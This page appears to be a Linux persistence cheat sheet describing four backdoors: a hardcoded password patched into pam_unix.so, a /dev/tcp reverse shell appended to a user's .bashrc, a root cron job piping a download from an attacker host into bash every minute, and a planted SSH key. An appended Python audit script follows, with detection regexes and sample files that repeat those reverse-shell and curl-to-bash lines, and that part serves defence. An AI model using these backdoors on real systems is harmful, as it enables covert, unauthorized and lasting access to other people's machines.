Backdoors

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

PAM

This backdoor consists of adding your own password to the pam_unix.so module.

pam_unix.so is the PAM module responsible for password authentication.

pam_unix.so uses the unix_verify_password function to verify the user's supplied password. We added a new line to our code:

```c
if (strcmp(p, "0xMitsurugi") != 0 )
```

.bashrc

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

Pick any user that logs in often and append a reverse shell to their .bashrc:

```bash
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc
```

Put up a nc listener on that ip and port to catch the connection.

CronJob

Requires root access.

System cron file -> /etc/crontab

Configure a task that sends you a reverse shell every minute. Add this line to the cron file:

```
* *     * * *   root    curl http://$attacker_ip:8080/shell | bash
```

Add this to the shell file served at that URL:

```bash
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
```

On the attacker machine:

```bash
nc -nvlp $port
```

SSH

Consists in saving our ssh key in some user's home directory. Then we can access it via ssh.

Generate an ssh key:

```bash
ssh-keygen
```

Copy our public key into the user's .ssh directory (sshd reads ~/.ssh/authorized_keys, and with StrictModes it refuses the file unless the permissions are tight):

```bash
mkdir -p ~/.ssh && chmod 700 ~/.ssh
cat id_rsa.pub >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
```
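The four persistence techniques on this page (a tampered pam_unix.so, a reverse shell in .bashrc, an every-minute cron job piping a download into bash, and a foreign key in authorized_keys) each leave a file-level trace a defender can audit. The script below is an added example and not code from the original page: it takes file contents as text so it runs offline over constructed samples, the function names and the sample lines are assumptions, and the PAM baseline hash stands in for the value a package manager would supply.

```python
"""Host audit for the persistence techniques described on this page.
Added example, not part of the original page. File contents are passed in
as text/bytes so the checks run offline over constructed samples."""
import hashlib
import re
from typing import Dict, List

# Shell fragments that have no business in a login script or crontab.
SUSPICIOUS_SHELL = re.compile(
    r"/dev/(tcp|udp)/"
    r"|\bbash -i\b"
    r"|\b(nc|ncat|netcat)\b[^\n]*\s-e\b"
    r"|\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"
)
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com")


def audit_module_hash(module_bytes: bytes, baseline_sha256: str) -> List[str]:
    """Compare a PAM module's hash against the package manager baseline.
    A recompiled pam_unix.so with an extra strcmp() will not match."""
    actual = hashlib.sha256(module_bytes).hexdigest()
    if actual == baseline_sha256:
        return []
    return [f"pam: module sha256 {actual[:16]}... differs from baseline"]


def audit_shell_rc(text: str) -> List[str]:
    """Flag .bashrc/.profile lines that open a network shell (comments skipped)."""
    return [f"rc: {line.strip()}" for line in text.splitlines()
            if not line.lstrip().startswith("#") and SUSPICIOUS_SHELL.search(line)]


def audit_crontab(text: str) -> List[str]:
    """Flag /etc/crontab or /etc/cron.d entries that run every minute or
    pipe a download into a shell."""
    findings = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if SUSPICIOUS_SHELL.search(s) or EVERY_MINUTE.match(s):
            findings.append(f"cron: {s}")
    return findings


def audit_authorized_keys(text: str, allowed_keys: Dict[str, str]) -> List[str]:
    """Flag keys whose blob is not in the allowlist. The comment field is
    attacker-controlled, so match on the key blob, never on the name."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Skip any leading options field (e.g. from="..."), then read type and blob.
        idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append(f"ssh: unparseable line {line.strip()!r}")
            continue
        blob = parts[idx + 1]
        comment = " ".join(parts[idx + 2:]) or "<no comment>"
        if blob not in allowed_keys:
            findings.append(f"ssh: unknown key {blob} ({comment})")
    return findings


# --- constructed samples (not real system files) ---
PRISTINE_PAM_UNIX = b"constructed stand-in for the distro's pam_unix.so bytes"
SAMPLE_BASHRC = """# constructed ~/.bashrc sample
export PATH=$HOME/bin:$PATH
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
"""
SAMPLE_CRONTAB = """# constructed /etc/crontab sample
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    curl http://203.0.113.5:8080/shell | bash
"""
SAMPLE_AUTH_KEYS = """ssh-ed25519 CONSTRUCTED_KNOWN_KEY_BLOB admin@workstation
ssh-ed25519 CONSTRUCTED_UNKNOWN_KEY_BLOB unknown@host
"""
ALLOWED_KEYS = {"CONSTRUCTED_KNOWN_KEY_BLOB": "admin laptop"}


def run_audit() -> Dict[str, List[str]]:
    """Run every check over the constructed samples and return the findings."""
    baseline = hashlib.sha256(PRISTINE_PAM_UNIX).hexdigest()  # normally from dpkg/rpm
    tampered = PRISTINE_PAM_UNIX + b" plus a recompiled password check"
    return {
        "pam": audit_module_hash(tampered, baseline),
        "bashrc": audit_shell_rc(SAMPLE_BASHRC),
        "cron": audit_crontab(SAMPLE_CRONTAB),
        "ssh": audit_authorized_keys(SAMPLE_AUTH_KEYS, ALLOWED_KEYS),
    }


if __name__ == "__main__":
    for area, hits in run_audit().items():
        print(f"[{area}] {len(hits)} finding(s)")
        for h in hits:
            print("   ", h)
```

On a real host, feed it `~/.bashrc` and `~/.profile` for every account with a shell, `/etc/crontab` plus `/etc/cron.d/*`, and each `~/.ssh/authorized_keys`; the PAM baseline is what `dpkg -V libpam-modules` (Debian) or `rpm -V pam` (RHEL) already checks, so the hash function mainly shows what that verification does. Matching SSH keys by blob rather than comment matters because the comment is free text that the person adding the key chooses.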